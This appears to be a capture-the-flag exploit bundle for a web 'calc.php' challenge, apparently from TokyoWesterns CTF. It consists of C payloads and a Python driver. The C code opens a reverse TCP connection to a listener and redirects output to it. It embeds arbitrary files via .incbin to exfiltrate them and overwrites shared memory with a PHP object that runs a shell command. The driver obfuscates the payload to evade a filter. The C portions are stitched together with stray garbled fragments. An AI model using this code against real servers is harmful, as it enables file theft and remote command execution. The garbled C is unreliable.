Oneline Calc
123;
return 123;
}
extern void *opendir(const char *);
extern void *readdir(void *);
extern int closedir(void *);
extern void *shmat(int, const void *, int);
extern int shmdt(const void *);
/* Hand-written mirror of the C library's directory entry, used to read
 * d_name out of what readdir() returns. Because readdir()'s result is cast
 * to this type, the field order and sizes must match the target libc's
 * struct dirent exactly; with 64-bit ino_t/off_t this puts d_name at
 * offset 19, which is the usual x86-64 glibc layout - TODO confirm against
 * the target system. */
typedef struct {
ino_t d_ino;
off_t d_off;
unsigned short d_reclen;
unsigned char d_type;
char d_name[256];
} dirent;
/* Generic socket address, same 16-byte shape as the libc definition. It
 * only exists so that the cast in connect() has a type to name. */
struct sockaddr {
unsigned short int sa_family;
char sa_data[14];
};
/* IPv4 address, stored as the raw 4 bytes the kernel expects (network byte
 * order); setup1() writes it with a pre-swapped constant. */
struct in_addr {
uint32_t s_addr;
};
/* IPv4 socket address: family, port, address, padding = 16 bytes, the same
 * size as the libc struct so connect() reads the fields where it expects
 * them. Port and address are filled in raw by setup1(), so the caller is
 * responsible for byte order. */
struct sockaddr_in {
unsigned short int sin_family;
unsigned short sin_port;
struct in_addr sin_addr;
char sin_zero[8];
};
int sock;
/* Write len bytes from data to the global reverse-connection socket with no
 * send() flags. Returns send()'s own result: the number of bytes queued, or
 * -1 with errno set. Nothing in the visible code calls it; it is kept as a
 * helper for payload variants that write explicitly instead of via fd 1. */
int data_send(char *data, int len) {
const int flags = 0;
int sent = send(sock, data, len, flags);
return sent;
}
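/* Constructor: open a TCP connection back to the listener and point fd 1
 * (stdout) at it, so anything the payload prints travels to the attacker
 * instead of the challenge's own pipe.
 * The address and port are stored raw, so the constants are already in the
 * byte order the kernel wants, as seen from a little-endian host:
 * 0x0100007f is 127.0.0.1 and 0x901f is port 8080 (htons(8080)). Change
 * both for a real target.
 * If the socket cannot be created or connected, stdout is left untouched
 * and sock is reset to -1, rather than redirecting output into a dead
 * socket as an unchecked dup2() would. */
__attribute__((constructor)) void setup1() {
struct sockaddr_in sa;
memset(&sa, 0, sizeof(sa));
sa.sin_family = 2; /* AF_INET */
sa.sin_addr.s_addr = 0x0100007f; /* replace with your IP */
sa.sin_port = 0x901f; /* and port */
sock = socket(2, 1, 0); /* AF_INET, SOCK_STREAM */
if (sock < 0) {
return;
}
if (connect(sock, (struct sockaddr*)&sa, sizeof(sa)) < 0) {
close(sock);
sock = -1;
return;
}
dup2(sock, 1);
}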
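/* Constructor: find the target's SysV shared-memory segment and overwrite
 * the string stored in it with the serialized PHP object that the Python
 * driver substitutes for __PAYLOAD__.
 * Candidate key files are the entries of /tmp whose name is exactly 7
 * characters and starts with 's' (presumably how the target names its key
 * file - TODO confirm); each becomes a key via ftok(path, 'a') and is
 * attached read/write.
 * The segment is assumed to hold an 8-byte length at offset 48 followed by
 * the string bytes at offset 64. A segment is only modified when that
 * length is exactly 26, the size of the string the exploit expects to find
 * there, which leaves unrelated segments alone. The length is replaced by
 * strlen(payload) and the bytes are copied in after it. Nothing bounds
 * that copy to the original 26 bytes: a longer payload deliberately runs
 * past the old string into the rest of the segment.
 * Keys with no segment behind them, or segments that cannot be attached,
 * are skipped instead of dereferencing shmat()'s -1 result, and each
 * attached segment plus the directory handle are released on the way out. */
__attribute__((constructor)) void f() {
const char *payload = "__PAYLOAD__";
void *dir = (void*)opendir("/tmp");
if (dir == NULL) {
return;
}
while (1) {
void *de = readdir(dir);
if (de == NULL) break;
char *s = ((dirent*)de)->d_name;
if (s[0] != 's' || strlen(s) != 7) {
continue;
}
char p[256];
snprintf(p, sizeof(p), "/tmp/%s", s);
int id = shmget(ftok(p, 'a'), 0, 0);
if (id < 0) {
continue; /* no segment for this key */
}
void *data = shmat(id, 0, 0);
if (data == (void*)-1) {
continue; /* attach refused, e.g. permissions */
}
uint64_t *size = (uint64_t*)((char*)data + 48);
char *var = (char*)data + 64;
if (*size == 26) {
uint64_t n = strlen(payload);
*size = n;
uint64_t i;
for (i = 0; i < n; i++) {
var[i] = payload[i];
}
}
shmdt(data);
}
closedir(dir);
}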
int g(){
int res = 0
123;
}
/* Embed the file named by __PATH__ (substituted by the Python driver) into
 * .rodata at assembly time using .incbin. The data is bracketed by the
 * global symbols bin_start and bin_end and followed by one zero byte so it
 * can also be treated as a C string. This is the read primitive of the
 * payload: the toolchain, not the running program, opens the file, so any
 * path readable at compile time can be exfiltrated. */
__asm__(".section .rodata\n"
".global bin_start\n"
".type bin_start, @object\n"
".balign 16\n"
"bin_start:\n"
".incbin \"__PATH__\"\n"
".global bin_end\n"
".type bin_end, @object\n"
".balign 1\n"
"bin_end:\n"
".byte 0\n"
);
/* C-side names for the two assembler labels. They are declared as pointer
 * objects only so they can be named from C; the code takes their addresses
 * (&bin_start) and never reads them as pointers, so the declared type has
 * no effect on behaviour. bin_end is not used by the visible code. */
extern const __attribute__((aligned(16))) void *bin_start;
extern const void* bin_end;
/* Generic socket address, same 16-byte shape as the libc definition. It
 * only exists so that the cast in connect() has a type to name. */
struct sockaddr {
unsigned short int sa_family;
char sa_data[14];
};
/* IPv4 address, stored as the raw 4 bytes the kernel expects (network byte
 * order); setup1() writes it with a pre-swapped constant. */
struct in_addr {
uint32_t s_addr;
};
/* IPv4 socket address: family, port, address, padding = 16 bytes, the same
 * size as the libc struct so connect() reads the fields where it expects
 * them. Port and address are filled in raw by setup1(), so the caller is
 * responsible for byte order. */
struct sockaddr_in {
unsigned short int sin_family;
unsigned short sin_port;
struct in_addr sin_addr;
char sin_zero[8];
};
int sock;
/* Push len bytes of data down the global reverse-connection socket.
 * Returns whatever send() returns (bytes queued, or -1 with errno set);
 * no flags are passed. Not referenced by the visible code, which writes
 * through fd 1 instead, but kept for payload variants that need it. */
int data_send(char *data, int len) {
int result = (int)send(sock, data, len, 0);
return result;
}
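/* Constructor: open a TCP connection back to the listener and point fd 1
 * (stdout) at it, so the embedded file that f() prints travels to the
 * attacker instead of the challenge's own pipe.
 * The address and port are stored raw, so the constants are already in the
 * byte order the kernel wants, as seen from a little-endian host:
 * 0x0100007f is 127.0.0.1 and 0x901f is port 8080 (htons(8080)). Change
 * both for a real target.
 * If the socket cannot be created or connected, stdout is left untouched
 * and sock is reset to -1, rather than redirecting output into a dead
 * socket as an unchecked dup2() would. */
__attribute__((constructor)) void setup1() {
struct sockaddr_in sa;
memset(&sa, 0, sizeof(sa));
sa.sin_family = 2; /* AF_INET */
sa.sin_addr.s_addr = 0x0100007f; /* replace with your IP */
sa.sin_port = 0x901f; /* and port */
sock = socket(2, 1, 0); /* AF_INET, SOCK_STREAM */
if (sock < 0) {
return;
}
if (connect(sock, (struct sockaddr*)&sa, sizeof(sa)) < 0) {
close(sock);
sock = -1;
return;
}
dup2(sock, 1);
}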
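/* Constructor: write the embedded file to fd 1, which setup1() has pointed
 * at the listener if it ran first (both are constructors in this unit and
 * setup1 is defined earlier; a constructor priority would make that order
 * explicit rather than relying on definition order).
 * The byte count is taken from the distance between the two assembler
 * labels instead of using printf("%s"), so a file that contains NUL bytes
 * (a binary, for instance) is sent whole rather than cut at the first
 * zero. write() is used directly, so there is no stdio buffer to lose and
 * no dependency on the stdout object; short writes are retried and a
 * trailing newline is still appended as before. */
__attribute__((constructor)) void f() {
const char *start = (const char*)&bin_start;
const char *end = (const char*)&bin_end;
size_t total = (size_t)(end - start);
size_t done = 0;
while (done < total) {
long n = write(1, start + done, total - done);
if (n <= 0) {
break;
}
done += (size_t)n;
}
write(1, "\n", 1);
}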
int g(){
int res = 0
import requests
# Successive reassignments: only the last uncommented value is in effect,
# the earlier ones look like local/lab targets left in place for switching.
# Pick one and drop the rest before running against a real target.
url = 'http://galileo.local:10080/calc.php'
url = 'http://192.168.121.171:10080/calc.php'
url = 'http://localhost:10080/calc.php'
url = 'http://olc.chal.ctf.westerns.tokyo/calc.php'
# url = 'http://192.168.121.171/calc.php'
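def exp():
    """Send the shared-memory overwrite stage (exp.c) to calc.php.

    Reads exp.c, splices the serialized Calc object in for the __PAYLOAD__
    marker, then rewrites the C source so it fits the 'formula' parameter:
    braces become the <% %> digraphs, '#' becomes '%:', and every newline
    becomes a space so the whole file is one line (presumably what the
    calc.php filter requires).  Because of that last step the C source must
    use only block comments; a line comment would swallow everything after
    it.  Braces and quotes inside the object are written as x7b / x7d / \"
    escapes instead, because they end up inside a C string literal where
    the digraph rewrite does not apply.

    `cmd` is the shell command the object carries; the declared length
    3 + len(cmd) covers the value '";' + cmd + ';' that lands in the `bin`
    field.  It writes the flag to a scratch file that leak() reads back
    afterwards.
    """
    # Text mode: a str payload keeps the str.replace() calls below valid on
    # Python 3 (bytes.replace with str arguments raises TypeError).
    with open('exp.c', 'r') as fh:
        payload = fh.read()
    cmd = "/readflag2>/var/tmp/0j29fqj30f"
    obj = 'a:2:{s:9:"__started";i:1;i:2;O:4:"Calc":3:{s:3:"bin";s:%d:"";%s;";s:3:"src";s:6:"abcdef";s:3:"tmp";R:4;}}' % (3 + len(cmd), cmd)
    obj = obj.replace('{', '\\x7b').replace('}', '\\x7d').replace('"', '\\"')
    payload = payload.replace('__PAYLOAD__', obj)
    payload = payload.replace('{', '<%')
    payload = payload.replace('}', '%>')
    payload = payload.replace('#', '%:')
    payload = payload.replace('\n', ' ')
    req = requests.get(url, params={
        'formula': payload
    })
    print(req.content)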
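def leak(path):
    """Send the file-read stage (leak.c) for `path` to calc.php.

    Reads leak.c and substitutes `path` for the __PATH__ marker; it lands
    inside an assembler .incbin "..." directive, so `path` must not contain
    a double quote.  The source is then rewritten the same way exp() does
    it: braces to the <% %> digraphs, '#' to '%:', newlines to spaces, so
    leak.c may only contain block comments.  The file contents are not in
    the HTTP response: the compiled payload writes them to the reverse
    connection set up in leak.c's setup1().
    """
    # Text mode keeps the str.replace() calls valid on Python 3 as well.
    with open('leak.c', 'r') as fh:
        payload = fh.read().replace('__PATH__', path)
    payload = payload.replace('{', '<%')
    payload = payload.replace('}', '%>')
    payload = payload.replace('#', '%:')
    payload = payload.replace('\n', ' ')
    req = requests.get(url, params={
        'formula': payload
    })
    print(req.content)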
# Order matters: leak the challenge source first, then fire the overwrite
# stage (whose command writes into /var/tmp/0j29fqj30f), then read that
# scratch file back through the same .incbin primitive.
leak('./calc.php')
exp()
leak('/var/tmp/0j29fqj30f')